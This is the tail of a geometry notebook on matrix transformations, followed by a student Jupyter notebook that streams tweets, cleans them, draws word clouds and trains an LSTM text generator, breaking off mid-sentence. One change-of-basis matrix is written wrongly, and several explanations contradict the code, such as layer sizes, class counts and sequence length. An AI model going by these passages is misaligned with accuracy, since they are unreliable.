cos(ang) # set the components of the matrix to the desired rotation xf.c11, xf.c12, xf.c21, xf.c22 = cost, -sint, sint, cost return pt * xf segs = [Segment(spin(seg.spt),spin(seg.ept)) for seg in segs] """ Combining Transformations Xform objects may be combined before being applied to a geometric object. Here, four transformations are defined by calling on static methods of the Xform class, and then combined before being recursively applied to a given collection of Segments. Note that the order of combination plays a significant role in the nature of the result. """ xf_rot = Xform.rotation(angle = radians(15)) xf_trn = Xform.translation(Vec(0.50, 0.33)) xf_scl = Xform.scale(1.02) xf_mir = Xform.mirror("world_yz") xf_sum = xf_trn * xf_rot * xf_scl # figure is a given collection of Segments figs = [figure] for i in range(count): figs.append([xf_sum*seg for seg in figs[-1]]) ``` <img src="http://geometric-computation-images.s3-website-us-east-1.amazonaws.com/1.09.P18.jpg" style="width: 200px; display: inline;"> ## A Library of Spatial Transformations ### Change of Basis \begin{align} {\large M_{\vec{s_{1}},\vec{s_{2}},\vec{s_{3}} \to \vec{e_{1}},\vec{e_{2}},\vec{e_{3}}} } = \begin{bmatrix} s_{1x} & s_{2x} & s_{3x} & 0 \\ s_{1y} & s_{2y} & s_{3y} & 0 \\ s_{1z} & s_{2z} & s_{3z} & 0 \\ 0 & 0 & 0 & 1 \\ \end{bmatrix} \end{align} \begin{align} {\large M_{\vec{e_{1}},\vec{e_{2}},\vec{e_{3}} \to \vec{t_{1}},\vec{t_{2}},\vec{t_{3}} } } = \begin{bmatrix} t_{1x} & t_{1x} & t_{1x} & 0 \\ t_{2y} & t_{2y} & t_{2y} & 0 \\ t_{3z} & t_{3z} & t_{3z} & 0 \\ 0 & 0 & 0 & 1 \\ \end{bmatrix} \end{align} \begin{align} \begin{bmatrix} 1 & 0 & 0 & o_{tx} \\ 0 & 1 & 0 & o_{ty} \\ 0 & 0 & 1 & o_{tz} \\ 0 & 0 & 0 & 1 \\ \end{bmatrix} \times {\large M_{\vec{e_{1}},\vec{e_{2}},\vec{e_{3}} \to \vec{t_{1}},\vec{t_{2}},\vec{t_{3}} } } \times {\large M_{\vec{s_{1}},\vec{s_{2}},\vec{s_{3}} \to \vec{e_{1}},\vec{e_{2}},\vec{e_{3}}} } \times \begin{bmatrix} 1 & 0 & 0 & -o_{sx} \\ 0 & 1 & 0 & -o_{sy} \\ 0 & 0 & 1 & -o_{sz} \\ 0 & 0 & 0 & 1 \\ \end{bmatrix} \end{align} <img src="http://geometric-computation-images.s3-website-us-east-1.amazonaws.com/1.09.P27.jpg" style="width: 200px; display: inline;">
github_jupyter
# <p style="text-align: center;"> Social Butterfly - Umbrella Academy - After Metadata </p> ![title](Images\Title_Images\Title_Image.jpg) ``` from IPython.display import HTML HTML('''<script> code_show=true; function code_toggle() { if (code_show){ $('div.input').hide(); } else { $('div.input').show(); } code_show = !code_show } $( document ).ready(code_toggle); </script> The raw code for this IPython notebook is by default hidden for easier reading. To toggle on/off the raw code, click <a href="javascript:code_toggle()">here</a>.''') ``` # <p style="text-align: center;"> Table of Contents </p> - ## 1. [Introduction](#Introduction) - ### 1.1 [Abstract](#abstract) - ### 1.2 [Importing Libraries](#importing_libraries) - ### 1.3 [Streaming](#streaming) - ### 1.3.1[Setting up Stream Listener](#stream_listener) - ### 1.3.2[Starting the Listener](#starting_the_listener) - ### 1.3.3[Making a Dataframe](#making_dataframe) - ### 1.4 [Dataset Summary](#dataset_summary) - ### 1.5 [Dataset Cleaning](#dataset_cleaning) - ### 1.5.1[Functions to clean data](#functions_for_cleaning) - ## 2. [Wordclouds](#wordclouds) - ### 2.1 [Number of words in a text](#number_of_words) - ### 2.2 [Generating Wordclouds](#Generating_Wordclouds) - ### 2.3 [Masking the wordcloud](#masking_wordcloud) - ### 2.4 [Preparing Wordclouds](#preparing_wordcloud) - ### 2.5 [Function for Building a GIF](#gif_building) - ## 3. [LSTM](#lstm) - ### 3.1 [Creating character/word mappings](#char_and_word_mapping) - ### 3.2 [Creating set of words](#creating_set_words) - ### 3.3 [Creating sequences](#creating_sequences) - ### 3.4 [Saving Tokens](#Saving_Tokens) - ### 3.5 [Integer Encoding Sequences](#Integer_Encoding) - ### 3.6 [Defining the Model](#defining_model) - ### 3.7 [Generating Sequences](#generating_sequence) - ### 3.7.1[Deeper_LSTM_Model](#DeeperModel) - ## 4. [Conclusion](#Conclusion) - ## 5. [Scope](#Scope) - ## 6. [Contribution](#Contribution) - ## 7. [Citation](#Citation) - ## 8. [License](#License) # <p style="text-align: center;"> 1.0 Introduction </p> <a id='Introduction'></a> # 1.1 Abstract <a id='abstract'></a> Now that we have collected the Metadata in the previous notebook(go to the [Link](./Umbrella_Academy_INFO6105_Collecting_Metadata.ipynb) if you haven't seen it yet). We can now stream data from twitter using these most occuring hashtags. In this notebook we will be scrapping data using the hashtags we scrapped in Collecting Metadata (Part 1) , using a real time streaming listener. For this data being scrapped we won't be using retweets and the conditional requirement is that dataset should be large enough in order fo us to build the model. What are we trying to build a model for? Our idea builds from the fact that creating content that too fastly and the one which can become popular as it gets posted and adds a x-factor to one's social media handle is quite hard , because there is so much data every where that one thing or other correlats with one another. Also, Creating content that doesn’t get popular and is not ranked well is a wasted expense. However, producing a blog post becomes popular and ranks highly is a wise investment. Repeating the same process will give you a consistent basis for a serious competitive advantage. Most people feel that optimizing content manually is a tedious and time consuming process. But it doesn’t have to be that way. We can incorporate content optimization into content creation workflow. In our project , we are somehow trying to work on a similar idea in order to create model which optimizes the content for social platform i.e social butterfly, by experimenting on other available platforms like twitter ,instagram etc. We are using a series of neural network i.e LSTM for doing the same. [Back to top](#Introduction) # 1.2 Importing Libraries <a id='importing_libraries'></a> In this step, we import libraries that we need for this notebook. A few basic libraries like numpy, pandas, matplotlib etc are used. Other libraries like tweepy, json, csv are used to collect data from twitter and save them as a json and csv file. Libraries like base [Back to top](#Introduction) ``` #Data Extraction and saving import json from json import dumps, loads from pandas.io.json import json_normalize as jn import tweepy import csv #Plotting and visualization import matplotlib.pyplot as plt #To encode and decode strings import codecs #Tweepy streaming from tweepy.streaming import StreamListener from tweepy import OAuthHandler from tweepy import Stream # diving into NLP tasks such as noun phrase extraction, sentiment analysis, classification, translation, and more. from textblob import TextBlob #time based and os dependent functionality import time import os import sys #Basic Python arrays and dataframe import numpy as np import pandas as pd #regex string commands and converting images to bas64 form import re,string import base64 from scipy.misc import imread #Library for wordcloud from wordcloud import WordCloud, STOPWORDS,ImageColorGenerator #Python gif and animation from IPython.display import HTML from matplotlib.pyplot import * from matplotlib import cm from matplotlib import animation from matplotlib import rc, animation rc('animation', html='html5') import io import imageio #LSTM libraries from keras.layers import Embedding from keras.models import Sequential from keras.layers import Dense from keras.layers import Dropout from keras.layers import LSTM from keras.utils import np_utils from keras.preprocessing.text import Tokenizer from keras.preprocessing.sequence import pad_sequences from keras.callbacks import ModelCheckpoint from keras.utils import np_utils import pickle from random import randint #Ignore warnings in outputs import warnings; warnings.simplefilter('ignore') #Twitter Credentials twitter_cred = dict() twitter_cred['CONSUMER_KEY'] = '' twitter_cred['CONSUMER_SECRET'] = '' twitter_cred['ACCESS_KEY'] = '' twitter_cred['ACCESS_SECRET'] = '' # Saving the Twitter Credentials to a json file script_dir = os.path.dirname('__file__') file_path = os.path.join(script_dir, 'JSON_and_CSV_Files/twitter_credentials.json') with open(file_path, 'w') as secret_info: json.dump(twitter_cred, secret_info, indent=4, sort_keys=True) with open('JSON_and_CSV_Files/twitter_credentials.json') as cred_data: info = json.load(cred_data) consumer_key = info['CONSUMER_KEY'] consumer_secret = info['CONSUMER_SECRET'] access_key = info['ACCESS_KEY'] access_secret = info['ACCESS_SECRET'] # Create the api endpoint auth = tweepy.OAuthHandler(consumer_key, consumer_secret) api = tweepy.API(auth) ``` # 1.3 Streaming <a id='streaming'></a> For collecting Metadata, we used user inputs for how many tweets should be collected and which hashtags should be scraped. However in this part, we'll use the most occuring hashtags as input and run it for a longer time (5 hours or more). [Back to top](#Introduction) # 1.3.1 Setting up Stream Listener<a id='stream_listener'></a> Here we'll set up a Stream Listener which will save the scraped tweets in a json file. We will also make sure that the tweets that we're collecting are not Retweets as there could be multiple retweets with the same content, which would make the content redundant. [Back to top](#streaming) ``` start_time = time.time() class MyListener(StreamListener): def __init__(self, start_time, time_limit=60): self.time = start_time self.limit = time_limit self.tweet_data = [] self.saveFile = open('JSON_and_CSV_Files/raw_tweets.json', 'a', encoding='utf-8') def on_data(self, data): if (time.time() - self.time) < self.limit: decoded = json.loads(data) if not decoded['text'].startswith('RT'): try: self.tweet_data.append(data) saveFile = open('JSON_and_CSV_Files/raw_tweets.json', 'w', encoding='utf-8') saveFile.write(u'[\n') saveFile.write(','.join(self.tweet_data)) saveFile.write(u'\n]') saveFile.close() #exit() return True except BaseException as e: print("Error on_data: %s" % str(e)) time.sleep(5) return True else: self.saveFile.close() return False def on_error(self, status): print(status) return True #if __name__ == '__main__': #MyListener = MyListener() #auth = OAuthHandler(consumer_key, consumer_secret) #auth.set_access_token(access_key, access_secret) #stream = Stream(auth,MyListener ) #stream.filter(track=['#ML', '#Datascience', '#Arima']) ``` # 1.3.2 Starting the Listener<a id='starting_the_listener'></a> In this step we start the stream listener for the given timeframe. We also filter our stream such that it only collects data on the given hashtags. We also restrict the language to english so as to not deal with non-ascii characters. [Back to top](#streaming) ``` #MyListener = MyListener() #auth = OAuthHandler(consumer_key, consumer_secret) #auth.set_access_token(access_key, access_secret) #stream = Stream(auth,MyListener(start_time, time_limit=18000) ) #stream.filter(track=['#ML', '#AI', '#deeplearning'],languages =["en"]) ``` # 1.3.3 Making a Dataframe<a id='making_dataframe'></a> In this step we will normalize the json file that we have, since it is in nested form(JSON Object inside a JSON Object). After this we save the file to a dataframe, since it is easier to work with a Pandas' Dataframe. [Back to top](#streaming) ``` # data=open('raw_tweets.json', 'r', encoding='utf-8') # df = pandas.io.json.json_normalize(data) # df.columns = df.columns.map(lambda x: x.split(".")[-1]) # df.head() with open('JSON_and_CSV_Files/raw_tweets.json', 'r', encoding="utf-8") as json_file: json_work = json.load(json_file) df = pd.io.json.json_normalize(json_work) ``` Since we'll be working with only the text values in our algorithm, we don't need any other extracted columns. So we select only the column 'text'. ``` #Setting our source for text generation df_clean=df['text'] #Making the dataframe df_cleans=pd.DataFrame({'text':df_clean}) ``` # 1.4 Dataset Summary <a id='dataset_summary'></a> Since this dataset is scraped from twitter, it is bound to have some irregular values. In this step we check the summary of the dataset by checking the first 5 columns of the scraped data, checking the data types of the columns and checking the summary of the dataset. [Back to top](#Introduction) ``` df_cleans.head() df_cleans.info() df_cleans.describe() ``` # 1.5 Dataset Cleaning <a id='dataset_cleaning'></a> Since this dataset is scraped from twitter, it is bound to have some irregular values. By seeing the summary of our dataset we have gained some important insight about the type of data, and we need to clean the data to be able to further process it. [Back to top](#Introduction) ### 1.5.1 Functions to clean data <a id='functions_for_cleaning'></a> We have created a wide array of functions to clean the data by removing hashtags and other entities in the text ('@', 'â'..). Then we have removed all non-ascii characters from the text and also removed all Emojis. Along with this we are also extracting hashtags from the tweets and saving them in a seperate column [Back to top](#dataset_cleaning) ``` def remove_RT(x): if x=="RT ": return " " #return str(x.replace('b\'RT ','')) def strip_links(text): link_regex = re.compile('((https?):((//)|(\\\\))+([\w\d:#@%/;$()~_?\+-=\\\.&](#!)?)*)', re.DOTALL) links = re.findall(link_regex, text) #cleanString = re.sub('\W+','', string ) for link in links: text = text.replace(link[0], ', ') #text = text.replace(cleanString, '') return text def strip_all_entities(text): entity_prefixes = ['@','#'] for separator in string.punctuation: if separator not in entity_prefixes : text = text.replace(separator,' ') words = [] for word in text.split(): word = word.strip() if word: if word[0] not in entity_prefixes: words.append(word) return ' '.join(words) def removeNonAscii(s): return "".join(i for i in s if ord(i)<128) df_cleans['TextNoMentions']=df_cleans['text'].str.replace('RT', ' ') df_cleans['TextNoMentions']=df_cleans['TextNoMentions'].str.replace('#', '', case=False) #df_cleans['TextNoLinks']=df_cleans['text'].apply(strip_links) df_cleans['TextNoMentions']=df_cleans['TextNoMentions'].str.replace('http\S+|www.\S+', '', case=False) #df_cleans['TextNoEntities']=df_cleans['TextNoLinks'].apply(strip_all_entities) df_cleans['TextNoMentions']=df_cleans['TextNoMentions'].apply(strip_all_entities) df_cleans['TextNoMentions']=df_cleans['TextNoMentions'].apply(removeNonAscii) a=df_cleans['TextNoMentions'].unique() a=a.tolist() df_cleaner=pd.DataFrame({'text':a}) df_cleaner.head() df_cleaner['text']=df_cleaner['text'].str.lower() ``` # <p style="text-align: center;"> 2.0 Wordclouds </p> <a id='wordclouds'></a> [Back to top](#Introduction) # 2.1 Number of words in a text <a id='number_of_words'></a> [Back to top](#wordclouds) ``` # Lets check the avg number of words in text written by each author in a histogram def word_count(row): """function to calculate the count of words in a given text """ text = row['text'] text_splited = text.split(' ') word_count = text_splited.__len__() return word_count df_cleaner['word_count'] = '' df_cleaner['word_count'] = df_cleaner.apply(lambda row: word_count(row), axis =1) df_cleaner.head() ``` # 2.2 Generating Wordclouds <a id='Generating_Wordclouds'></a> [Back to top](#wordclouds) ``` #mws = df_cleaner["text"].values wc = WordCloud(background_color="white", max_words=5000, stopwords=STOPWORDS, max_font_size= 50) # generate word cloud wc.generate(" ".join(df_cleaner.text.values)) # show plt.figure(figsize=(16,13)) plt.imshow(wc, interpolation='bilinear') plt.title("words from all author", fontsize=14,color='seagreen') plt.axis("off") ``` # 2.3 Masking the wordcloud <a id='masking_wordcloud'></a> [Back to top](#wordclouds) ``` def base_64(input_image): """ Function to convert the image to base64 """ image = open(input_image, 'rb') #open binary file in read mode image_read = image.read() output_base64 = base64.encodebytes(image_read) return output_base64 def codecs_img(input_image,base64_image): """Generate the Mask for EAP """ f1 = open(input_image, "wb") f1.write(codecs.decode(base64_image,'base64')) f1.close() img1 = imageio.imread(input_image) #img = img1.resize((980,1000)) #imgplot=plt.imshow(img1) #plt.show() hcmask=img1 return hcmask mask = base_64('Images/Wordcloud/mask.png') img1 = base_64('Images/Wordcloud/1.png') img2 = base_64('Images/Wordcloud/2.png') img3 = base_64('Images/Wordcloud/3.png') img4 = base_64('Images/Wordcloud/4.png') hcmask1 = codecs_img('Images/Wordcloud/mask.png' , mask) hcmask2 = codecs_img('Images/Wordcloud/1.png' , img1) hcmask3 = codecs_img('Images/Wordcloud/2.png' , img2) hcmask4 = codecs_img('Images/Wordcloud/3.png' , img3) hcmask5 = codecs_img('Images/Wordcloud/4.png' , img4) ``` Updating the stopwords because data from twitter has a few terms which appear over and over again, which have no relevance to our text like 'gt' which is an acronym for go to, it is added before a link, so along with removing links, we must also remove these words ``` Stopwords_Updated = ('amp', 'gt', 'via' ,'de', 'https') STOPWORDS=STOPWORDS.union(Stopwords_Updated) mask = df_cleaner['text'].values def generate_wordcloud(words, mask): """ Generating Word Clouds """ word_cloud = WordCloud(width = 512, height = 512, background_color='white', stopwords=STOPWORDS, mask=mask, max_font_size= 45).generate(" ".join(words)) plt.figure(figsize=(10,8)) image_colors = ImageColorGenerator(mask) plt.imshow(word_cloud, interpolation='bilinear') # interpolation(helps in masking) plt.axis('off') plt.tight_layout(pad=0) plt.show() generate_wordcloud(mask,hcmask1) ``` # 2.4 Preparing Wordclouds <a id='preparing_wordcloud'></a> [Back to top](#wordclouds) ``` def generate_wordclouds_gif(words, mask, wc_list): """ Generating Word Clouds """ word_cloud = WordCloud(width = 512, height = 512, background_color='white', stopwords=STOPWORDS, mask=mask, max_font_size= 45).generate(" ".join(words)) wc_list.append(word_cloud) return wc_list %%capture wc_list=[] generate_wordclouds_gif(mask, hcmask2, wc_list) generate_wordclouds_gif(mask, hcmask3, wc_list) generate_wordclouds_gif(mask, hcmask4, wc_list) generate_wordclouds_gif(mask, hcmask5, wc_list) generate_wordclouds_gif(mask, hcmask5, wc_list) generate_wordclouds_gif(mask, hcmask4, wc_list) generate_wordclouds_gif(mask, hcmask3, wc_list) generate_wordclouds_gif(mask, hcmask2, wc_list) ``` # 2.5 Function for Building a GIF <a id='gif_building'></a> [Back to top](#wordclouds) ``` start = time.time() def build_gif(imgs = wc_list, show_gif=False, save_gif=True, title=''): """function to create a gif of heatmaps""" fig, ax = plt.subplots(nrows=1,ncols=1,figsize=(21,15)) ax.set_axis_off() author_range = ["A", "B", "C", "D", "E", "F", "G", "H"] def show_im(pairs): ax.clear() ax.set_title(str((pairs[0]))) ax.imshow(pairs[1]) ax.set_axis_off() pairs = list(zip(author_range, imgs)) im_ani = matplotlib.animation.FuncAnimation(fig, show_im, pairs,interval=450, repeat_delay=0, blit=False, repeat=True) plt.cla() from IPython.display import HTML HTML(im_ani.to_html5_video()) if save_gif: im_ani.save('Images/GIFs/animation1.gif', writer='pillow') #, writer='imagemagick' if show_gif: plt.show() return end = time.time() print("Time taken by above cell is {}".format(end-start)) %%capture start = time.time() build_gif() end = time.time() print(end-start) filename = 'Images/GIFs/animation1.gif' video = io.open(filename, 'r+b').read() encoded = base64.b64encode(video) HTML(data='''<img src="data:image/gif;base64,{0}" type="gif" />'''.format(encoded.decode('ascii'))) ``` # <p style="text-align: center;"> 3.0 LSTM</p> <a id='lstm'></a> [Back to top](#Introduction) A language model can predict the probability of the next word in the sequence, based on the words already observed in the sequence. **Neural network models** are a preferred method for developing statistical language models because they can use a distributed representation where different words with similar meanings have similar representation and because they can use a large context of recently observed words when making predictions. In this section, we will develop a simple LSTM network to learn sequences of characters from the tweets we scrapped. In the next section we will use this model to generate new sequences of words. But Before that lets look at how LSTM works. A **recurrent neural network** (RNN) is a class of artificial neural network where connections between nodes form a directed graph along a temporal sequence. This allows it to exhibit temporal dynamic behavior. Unlike feedforward neural networks, RNNs can use their internal state (memory) to process sequences of inputs. This makes them applicable to tasks such as unsegmented, connected handwriting recognition or speech recognition.One of the appeals of RNNs is the idea that they might be able to connect previous information to the present task. Sometimes we only want to look at the current information (recent) to perform present task and past information is of not much use to our result, but in case of language modeling , where context is important at times and not important at other times the situation becomes trickier. In cases , where the gap between relevant information and the place where it's needed is small, RNN are useful because they can learn to use past information. But there are also cases where we need more context, the gap becomes large between two informations, RNNs is unable to learn to connect the information. **And that's when LSTM comes in play** ![rnn](Images\LSTM\RNN.png) **Long Short Term Memory** networks – usually just called “LSTMs” – are a special kind of RNN, capable of learning long-term dependencies. LSTMs are explicitly designed to avoid the long-term dependency problem. Remembering information for long periods of time is practically their default behavior ### All recurrent neural networks have the form of a chain of repeating modules of neural network. In standard RNNs, this repeating module will have a very simple structure, such as a single tanh layer.*** ![simplernn](Images\LSTM\SimpleRnn.png) ### LSTMs also have this chain like structure, but the repeating module has a different structure. Instead of having a single neural network layer, there are four, interacting in a very special way.*** ![Lstm](Images\LSTM\Lstm.png) ### How LSTM Works? **Lets first look at the notations used in the chain like structure(it's not that complex)** ![notation](Images\LSTM\notation.png) In the above diagram, each line carries an entire vector, from the output of one node to the inputs of others. > **Pink circles** represent pointwise operations, like vector addition > **Yellow boxes** are learned neural network layers. > **Lines** merging denote concatenation > **Line** forking denote its content being copied and > The **copies** going to different locations LSTM is a chain like structure containing various cells , each represented by green box in above diagram. The most important thing in LSTMs is the cell state i.e the horizontal line running through the top of the diagram. The cell state is kind of like a conveyor belt. It runs straight down the entire chain, with only some minor linear interactions. It’s very easy for information to just flow along it unchanged. ![LSTM-1](Images\LSTM\LSTM3-C.png) The LSTM does has the ability to remove or add information to the cell state, carefully regulated by structures called gates. Gates are a way to optionally let information through. They are composed out of a sigmoid neural net layer and a pointwise multiplication operation. The sigmoid layer outputs numbers between zero and one, describing how much of each component should be let through. A value of zero means “let nothing through,” while a value of one means “let everything through!” ![LSTM-2](Images\LSTM\LSTM3-gate.png) An LSTM has three of these gates, to protect and control the cell state. #### Step by Step LSTM 1. The first step in LSTM is to decide what information we are going to discard from the cell state. This decison is made by sigmoid layer. It looks at ***ht-1 and xt***, and outputs a number between 0 and 1 for each number in the cell state ***Ct−1***. > 1 represents “keep this” while a 0 represents “get rid of this.” ![LSTM-3](Images\LSTM\LSTM3-f.png) 2. The next step is to decide what new information we’re going to store in the cell state. This has two parts. >First, a sigmoid layer called the “input gate layer” decides which values we’ll update and which we will reject. >Next, a tanh layer creates a vector of new values, **C̃t**, that could be added to the new state. ![LSTM-4](Images\LSTM\LSTM3-I.png) **Next step, combine these two to create an update to the state.** 3. Then we update the old cell state, **Ct−1**, into the new cell state **Ct**. We multiply the old state by **ft**, forgetting the things we decided to forget earlier. Then we add **it∗C̃t** . This is the new values, scaled by how much we decided to update each state value. ![LSTM-5](Images\LSTM\LSTM3-C.png) 4. Finally, we need to decide what we’re going to output. This output will be based on our cell state, but will be a filtered version. First, we run a sigmoid layer which decides what parts of the cell state we’re going to output. Then, we put the cell state through tanh (to push the values to be between −1 and 1) and multiply it by the output of the sigmoid gate, so that we only output the parts we decided to. ![LSTM-6](Images\LSTM\LSTMo.png) ## Lets work it out!! Lets try making a model based on LSTM ![Lets_Start](Images\GIFs\Lets_Start.gif) The language model will be statistical and will predict the probability of each word given an input sequence of text. The predicted word will be fed in as input to in turn generate the next word. A key design decision is how long the input sequences should be. They need to be long enough to allow the model to learn the context for the words to predict. This input length will also define the length of seed text used to generate new sequences when we use the model. # 3.1 Creating character/word mappings <a id='char_and_word_mapping'></a> [Back to top](#lstm) We need to transform the raw text into a sequence of tokens or words that we can use as a source to train the model. We will be removing following from our given input texts > 1. Replace ‘–‘ with a white space so we can split words better. > 2. Split words based on white space. > 3. Remove all punctuation from words to reduce the vocabulary size (e.g. ‘What?’ becomes ‘What’). > 4. Remove all words that are not alphabetic to remove standalone punctuation tokens. > 5. Normalize all words to lowercase to reduce the vocabulary size. Vocabulary size is a big deal with language modeling. A smaller vocabulary results in a smaller model that trains faster. #### We can run this cleaning operation on our loaded document and print out some of the tokens ``` # turn a doc into clean tokens def clean_doc(row): # replace '--' with a space ' ' text = row['text'] text = text.replace('--', ' ') # split into tokens by white space tokens = text.split() # remove punctuation from each token table = str.maketrans('', '', string.punctuation) tokens = [w.translate(table) for w in tokens] # remove remaining tokens that are not alphabetic tokens = [word for word in tokens if word.isalpha()] # make lower case tokens = [word.lower() for word in tokens] return tokens df_cleaner['token'] = df_cleaner.apply(lambda row: clean_doc(row), axis =1) #loaded document as an argument and returns an array of clean tokens. df_cleaner.head() ``` # 3.2 Creating set of words <a id='creating_set_words'></a> [Back to top](#lstm) ``` #creating a set of all words in the text columns def list_creation(list_trial): list_trial=list_trial.tolist() result_trial = set(x for l in list_trial for x in l) #print (result_set) return (result_trial) df_tokens=list_creation(df_cleaner['token']) df_tokens_=set(df_tokens) print('Total Tokens: %d' % len(df_tokens)) print('Unique Tokens: %d' % len(df_tokens_)) ``` # 3.3 Creating sequences <a id='creating_sequences'></a> We are training a statistical language model from the prepared data. It has a few unique characteristics: > 1. It uses a distributed representation for words so that different words with similar meanings will have a similar representation. > 2. It learns the representation at the same time as learning the model. > 3. It learns to predict the probability for the next word using the context of the last 100 words. We will be using the concept of an Embedding Layer to learn the representation of words, and a Long Short-Term Memory (LSTM) recurrent neural network to learn to predict words based on their context.Steps are as follow 1. Firstly we will be organizing the long list of tokens into sequences of n input words and 1 output word. That is, sequences of n+1 words. We can do this by iterating over the list of tokens from token n+1 onwards and taking the prior n tokens as a sequence, then repeating this process to the end of the list of tokens. For our example we will be using a sequence of 11 words [Back to top](#lstm) ``` # organize into sequences of tokens length = 11 + 1 sequences = list() df_tokens=list(df_tokens) for i in range(length, len(df_tokens)): # select sequence of tokens seq = df_tokens[i-length:i] # convert into a line line = ' '.join(seq) # store sequences.append(line) print('Total Sequences: %d' % len(sequences)) #use sequences for modeling ``` # 3.4 Saving Tokens and Loading Tokens <a id='Saving_Tokens'></a> ## One Dialog per line [Back to top](#lstm) ``` # save tokens to file, one dialog per line def save_doc(lines, filename): data = '\n'.join(lines) file = open(filename, 'w') file.write(data) file.close() ## loads tokens to file, one dialog per line def load_doc(filename): # open the file as read only file = open(filename, 'r') # read all text text = file.read() # close the file file.close() return text out_filename = 'LSTM_Files/republic_sequences.txt' save_doc(sequences, out_filename) # load in_filename = 'LSTM_Files/republic_sequences.txt' doc = load_doc(in_filename) lines = doc.split('\n') ``` # 3.5 Integer Encoding Sequences <a id='Integer_Encoding'></a> [Back to top](#lstm) The word embedding layer expects input sequences to be comprised of integers. We can map each word in our vocabulary to a unique integer and encode our input sequences. Later, when we make predictions, we can convert the prediction to numbers and look up their associated words in the same mapping. To do this encoding, we will use the Tokenizer class in the Keras API. >1. First, the Tokenizer must be trained on the entire training dataset, which means it finds all of the unique words in the data and assigns each a unique integer. >2. We can then use the fit Tokenizer to encode all of the training sequences, converting each sequence from a list of words to a list of integers. ``` # integer encode sequences of words tokenizer = Tokenizer() tokenizer.fit_on_texts(lines) sequences = tokenizer.texts_to_sequences(lines) ``` ## Word Index We can access the mapping of words to integers as a dictionary attribute called word_index on the Tokenizer object. We need to know the size of the vocabulary for defining the embedding layer later. We can determine the vocabulary by calculating the size of the mapping dictionary. Words are assigned values from 1 to the total number of words .The Embedding layer needs to allocate a vector representation for each word in this vocabulary from index 1 to the largest index and because indexing of arrays is zero-offset, the index of the word at the end of the vocabulary will be n, that means the array must be n+1 in length. when specifying the vocabulary size to the Embedding layer, we specify it as 1 larger than the actual vocabulary. ``` # vocabulary size vocab_size = len(tokenizer.word_index) + 1 ``` ### Input and Output Sequences Now encoding of sequence is done, so we need to know the input (X) and output (y) elememts. We do that by array slicing. We have used one hot encoding for output word, converting it from an integer to a vector of 0 values, 1 for each word in vocabulary,indicating 1 to specific word at the index of words . We have done this , so that the model learns to predict the probability distribution for the next word and the ground truth from which to learn from is 0 for all words except the actual word that comes next. Keras provides the to_categorical() that can be used to one hot encode the output words for each input-output sequence pair. ***Finally, we need to specify to the Embedding layer how long input sequences are. A good generic way to specify that is to use the second dimension (number of columns) of the input data’s shape. That way, if you change the length of sequences when preparing data, you do not need to change this data loading code; it is generic.*** ``` sequences = np.asarray(sequences) X, y = sequences[:,:-1], sequences[:,-1] seq_length = X.shape[1] y = np_utils.to_categorical(y, num_classes=vocab_size) ``` # 3.6 Defining the Model <a id='defining_model'></a> [Back to top](#lstm) We will be fitting and training our model now. The learned embedding needs to know the size of the vocabulary and the length of input sequences as previously discussed. It also has a parameter to specify how many dimensions will be used to represent each word. That is, the size of the embedding vector space. We will use a two LSTM hidden layers with 200 memory cells each. More memory cells and a deeper network may achieve better results. ``` # define model model = Sequential() model.add(Embedding(vocab_size, 75, input_length=seq_length)) model.add(LSTM(100, return_sequences=True)) model.add(LSTM(100)) model.add(Dense(100, activation='relu')) model.add(Dense(vocab_size, activation='softmax')) print(model.summary()) ``` #### Important Points to Note:- >A dense fully connected layer with 200 neurons connects to the LSTM hidden layers to interpret the features extracted from the sequence. The output layer predicts the next word as a single vector the size of the vocabulary with a probability for each word in the vocabulary. A softmax activation function is used to ensure the outputs have the characteristics of normalized probabilities. >Our model is learning a multi-class classification and this is the suitable loss function for this type of problem. The efficient Adam implementation to mini-batch gradient descent is used and accuracy is evaluated of the model. >Finally, the model is fit on the data for 100 training epochs with a modest batch size of 128 to speed things up. #### Model Parameters:- >Activation Function: We have used ReLU as the activation function. ReLU is a non-linear activation function, which helps complex relationships in the data to be captured by the model. >Optimiser: We use adam optimiser, which is an adaptive learning rate optimiser. >Loss function: We will train a network to output a probability over the 10 classes using Cross-Entropy loss, also called Softmax Loss. It is very useful for multi-class classification. ``` %%capture # compile model model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) # fit model MODEL=model.fit(X, y, batch_size=128, epochs=100) ``` #### We use the Keras model API to save the model to the file ‘model.h5‘ in the current working directory. Our model is all trained now and can be utilised to generate new sequences of texts that have same statistical properties, although it might be difficult but then nothing is impossible. We need the text so that we can choose a source sequence as input to the model for generating a new sequence of text. The model will require 100 words as input. We will need to specify the expected length of input. We can determine this from the input sequences by calculating the length of one line of the loaded data and subtracting 1 for the expected output word that is also on the same line. ``` # save the model to file model.save('LSTM_Files/model.h5') # save the tokenizer output = open('LSTM_Files/myfile.pkl', 'wb') pickle.dump(tokenizer, output) output.close() #pkl_file = open('tokenizer.pkl', 'rb') #mydict2 = pickle.load(pkl_file) #pkl_file.close() seq_length = len(lines[0].split()) - 1 ####sequence lenght that we will feed ``` ![almost_there](Images\GIFs\almost_there.gif) # 3.6 Generating Sequences <a id='generating_sequence'></a> Preparing a seed input, which is randomly done ``` seed_text = lines[randint(0,len(lines))] print(seed_text + '\n') ``` Basis to understand the following present given underneath >1. First, the seed text must be encoded to integers using the same tokenizer that we used when training the model. >Following line in code shows us this encoded = tokenizer.texts_to_sequences([in_text])[0] >2. The model can predict the next word directly by calling model.predict_classes() that will return the index of the word with the highest probability. (represented by yhat). Look up the index in the Tokenizers mapping to get the associated word. >3. Then we will be appending this word to the seed text and repeat the process. >4. The input sequence is going to get too long. We can truncate it to the desired length after the input sequence has been encoded to integers. Keras provides the pad_sequences() function that we can use to perform this truncation. ``` def generate_seq(model, tokenizer, seq_length, seed_text, n_words): result = list() in_text = seed_text # generate a fixed number of words for _ in range(n_words): # encode the text as integer encoded = tokenizer.texts_to_sequences([in_text])[0] # truncate sequences to a fixed length encoded = pad_sequences([encoded], maxlen=seq_length, truncating='pre') # predict probabilities for each word yhat = model.predict_classes(encoded, verbose=0) # map predicted word index to word out_word = '' for word, index in tokenizer.word_index.items(): if index == yhat: out_word = word break # append to input in_text += ' ' + out_word result.append(out_word) return ' '.join(result) ``` #### Generate a sequence of new words given some seed text. ``` # generate new text generated = generate_seq(model, tokenizer, seq_length, seed_text, 50) print(generated) ``` #### BLEU (bilingual evaluation understudy) is an algorithm for evaluating the quality of text which has been machine-translated from one natural language to another. Quality is considered to be the correspondence between a machine's output and that of a human: "the closer a machine translation is to a professional human translation, the better it is" – this is the central idea behind BLEU.[1][2] BLEU was one of the first 